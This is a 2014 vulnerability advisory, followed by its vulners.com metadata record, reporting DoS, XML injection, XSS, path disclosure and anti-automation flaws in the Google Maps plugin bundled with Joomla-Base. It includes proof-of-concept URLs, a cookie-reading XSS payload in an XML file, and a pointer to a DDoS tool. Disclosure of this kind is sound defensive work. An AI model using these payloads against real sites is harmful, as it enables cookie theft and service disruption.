Hello 3APA3A!
These are Denial of Service, XML Injection, Cross-Site Scripting, Full path disclosure and Insufficient Anti-automation vulnerabilities in Joomla-Base. This is package of Joomla with different plugins (with their vulnerabilities).
These vulnerabilities are in Google Maps plugin for Joomla, which is used in this package. In 2013-2014 I wrote advisories about multiple vulnerabilities in Google Maps plugin (http://securityvulns.ru/docs29645.html, http://securityvulns.ru/docs29670.html and http://seclists.org/fulldisclosure/2014/Feb/53).
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of Joomla-Base, which includes this plugin.
After my informing, the developer removed this plugin from his package (https://github.com/pabloarias/Joomla-Base/issues/1).
-------------------------
Affected vendors:
-------------------------
Pablo Arias
https://github.com/pabloarias/Joomla-Base
----------
Details:
----------
Denial of Service (WASC-10):
http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=google.com
Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).
XML Injection (WASC-23):
http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xml.xml
It's possible to include external xml-files. Which also can be used for XSS attack:
XSS via XML Injection (WASC-23):
http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xss.xml
File xss.xml:
<?xml version="1.0" encoding="utf-8"?>
<feed>
<title>XSS</title>
<entry>
<div xmlns="http://www.w3.org/1999/xhtml"><script>alert(document.cookie)</script></div>
</entry>
</feed>
Cross-Site Scripting (WASC-08):
http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E
Full path disclosure (WASC-13):
http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php
This is possible with corresponding PHP settings, when warnings are shown.
Insufficient Anti-automation (WASC-21):
In this functionality there is no reliable protection from automated requests.
Also in my third advisory concerning Google Maps plugin, I wrote about security bypass for built-in domain restriction functionality and described method of bypass protection against automated requests introduced in version 3.2. So even the latest version is vulnerable to IAA.
Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
{"id": "SECURITYVULNS:DOC:30603", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "Multiple vulnerabilities in Joomla-Base", "description": "\r\nHello 3APA3A!\r\n\r\nThese are Denial of Service, XML Injection, Cross-Site Scripting, Full path disclosure and Insufficient Anti-automation vulnerabilities in Joomla-Base. This is package of Joomla with different plugins (with their vulnerabilities).\r\n \r\nThese vulnerabilities are in Google Maps plugin for Joomla, which is used in this package. In 2013-2014 I wrote advisories about multiple vulnerabilities in Google Maps plugin (http://securityvulns.ru/docs29645.html, http://securityvulns.ru/docs29670.html and http://seclists.org/fulldisclosure/2014/Feb/53).\r\n \r\n-------------------------\r\nAffected products:\r\n-------------------------\r\n \r\nVulnerable are all versions of Joomla-Base, which includes this plugin.\r\n \r\nAfter my informing, the developer removed this plugin from his package (https://github.com/pabloarias/Joomla-Base/issues/1).\r\n \r\n-------------------------\r\nAffected vendors:\r\n-------------------------\r\n \r\nPablo Arias\r\nhttps://github.com/pabloarias/Joomla-Base\r\n \r\n----------\r\nDetails:\r\n----------\r\n \r\nDenial of Service (WASC-10):\r\n \r\nhttp://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=google.com\r\n \r\nBesides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).\r\n \r\nXML Injection (WASC-23):\r\n \r\nhttp://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xml.xml\r\n \r\nIt's possible to include external xml-files. Which also can be used for XSS attack:\r\n \r\nXSS via XML Injection (WASC-23):\r\n \r\nhttp://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xss.xml\r\n \r\nFile xss.xml:\r\n \r\n<?xml version="1.0" encoding="utf-8"?>\r\n<feed>\r\n <title>XSS</title>\r\n <entry>\r\n <div xmlns="http://www.w3.org/1999/xhtml"><script>alert(document.cookie)</script></div>\r\n </entry>\r\n</feed>\r\n \r\nCross-Site Scripting (WASC-08):\r\n \r\nhttp://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E\r\n \r\nFull path disclosure (WASC-13):\r\n \r\nhttp://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php\r\n \r\nThis is possible with corresponding PHP settings, when warnings are shown.\r\n \r\nInsufficient Anti-automation (WASC-21):\r\n \r\nIn this functionality there is no reliable protection from automated requests.\r\n \r\nAlso in my third advisory concerning Google Maps plugin, I wrote about security bypass for built-in domain restriction functionality and described method of bypass protection against automated requests introduced in version 3.2. So even the latest version is vulnerable to IAA. \r\n \r\nBest wishes & regards,\r\nEugene Dokukin aka MustLive\r\nAdministrator of Websecurity web site\r\nhttp://websecurity.com.ua\r\n", "published": "2014-05-04T00:00:00", "modified": "2014-05-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30603", "reporter": "Securityvulns", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-08-31T11:10:52", "viewCount": 246, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13714"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": 1.4}, "_state": {"dependencies": 1678962961, "score": 1684016453, "affected_software_major_version": 0, "epss": 1679323282}, "_internal": {"score_hash": "9da5bf5d94c4f3c7fb594a5395d131dc"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}